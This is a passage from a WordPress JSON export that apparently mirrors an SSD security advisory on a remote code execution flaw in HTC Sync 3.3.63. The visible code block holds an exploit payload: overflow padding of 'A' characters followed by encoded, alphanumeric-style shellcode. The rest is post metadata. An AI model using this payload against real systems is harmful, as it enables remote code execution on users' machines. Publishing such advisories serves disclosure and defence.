class=\"crayon-line\" id=\"crayon-58b4a5de062ae059867162-1\"><span class=\"crayon-e\">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b4a5de062ae059867162-2\"><span class=\"crayon-e\">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58b4a5de062ae059867162-3\"><span class=\"crayon-e\">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b4a5de062ae059867162-4\"><span class=\"crayon-e\">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58b4a5de062ae059867162-5\"><span class=\"crayon-e\">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b4a5de062ae059867162-6\"><span class=\"crayon-e\">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58b4a5de062ae059867162-7\"><span class=\"crayon-e\">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b4a5de062ae059867162-8\"><span class=\"crayon-e\">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58b4a5de062ae059867162-9\"><span class=\"crayon-i\">AAAAAAAAAA<\/span>\u06eb\u9090\ue124<span class=\"crayon-i\">C<\/span>\ue289\ucdd9\u72d9\u5ff4\u5957\u4949\u4949\u4949\u4949\u4949\u4343\u4343\u4343\u5137\u6a5a\u5841\u3050\u3041\u6b41\u4141\u3251\u4241\u4232\u3042\u4242\u4241\u5058\u4138\u7542\u494a\u4c4b\u7869\u724f\u5045\u7057\u7077\u7031<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b4a5de062ae059867162-10\">\u594d\u6558\u7144\u5049\u7431\u4b6c\u3076\u3050\u6b6e\u7242\u4c54\u4b4c\u6243\u5454\u4b4c\u5242\u4866\u6f36\u774c\u7a73\u5637\u5156\u4f4b\u4c6e\u6c55\u3145\u6c61\u6266\u4c46\u7045\u5169\u6f4a\u6d56\u7157\u5739\u6238\u526a\u7242\u3746\u6b6e\u7252\u3052\u4b6c\u4a50<\/div>\n<div class=\"crayon-line\" id=\"crayon-58b4a5de062ae059867162-11\">\u6c75\u4b6c\u6c42\u5134\u5862\u6368\u3837\u7177\u316e\u7142\u4b6c\u7962\u3051\u7157\u334e\u4b4c\u7963\u6857\u7369\u5a66\u6962\u6b4e\u5466\u4b4c\u5135\u5638\u3130\u6f59\u4c4e\u316f\u4f78\u6d46\u7147\u674a\u4867\u7059\u3564\u564a\u4344\u6d71\u6839\u6b45\u6d51\u5477\u3544<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b4a5de062ae059867162-12\">\u7469\u6863\u6b4e\u3846\u3451\u6166\u4339\u5663\u4b4c\u6c46\u4b30\u6b4e\u6873\u6c77\u6176\u4369\u6b4e\u5435\u4b4c\u6156\u5068\u394b\u7463\u7455\u5477\u6b53\u4b51\u6170\u4931\u5a70\u3156\u6f79\u7079\u6f43\u6f33\u5a50\u4b6c\u3232\u4b6a\u4d4c\u4d71\u6a50\u3153\u4d4c\u554d<\/div>\n<div class=\"crayon-line\" id=\"crayon-58b4a5de062ae059867162-13\">\u526e\u7057\u7037\u5045\u3056\u5873\u5146\u6b6e\u4f52\u574d\u6f59\u754a\u4b4f\u7068\u654d\u3259\u6673\u6870\u464e\u554c\u6d6d\u6d6f\u4f6b\u656b\u4c47\u3673\u4c43\u5a55\u506d\u6b49\u7039\u3534\u4534\u4b4f\u5761\u3362\u5242\u4f62\u6a30\u7067\u6343\u6f39\u756a\u4372\u5173<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b4a5de062ae059867162-14\">\u6c30\u5343\u6e54\u4542\u5852\u3575\u3053\u4141<\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0022 seconds] -->  <\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3026\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: Maor Schwartz| Date: Mon, 27 Feb 2017 10:19:14 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory describes a remote code execution (RCE) found in HTC Sync version v3.3.63. Credit An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program. Vendor response The vulnerability was not reported to the vendor because the product has reached end of life on 31 August 2016 &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3026\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory &#8211; HTC Sync Remote Code Execution<\/span> <span class=\"meta-nav\">&#8594;<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[10755],"class_list":["post-6801","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-commentary"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6801","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=6801"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6801\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=6801"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=6801"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=6801"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}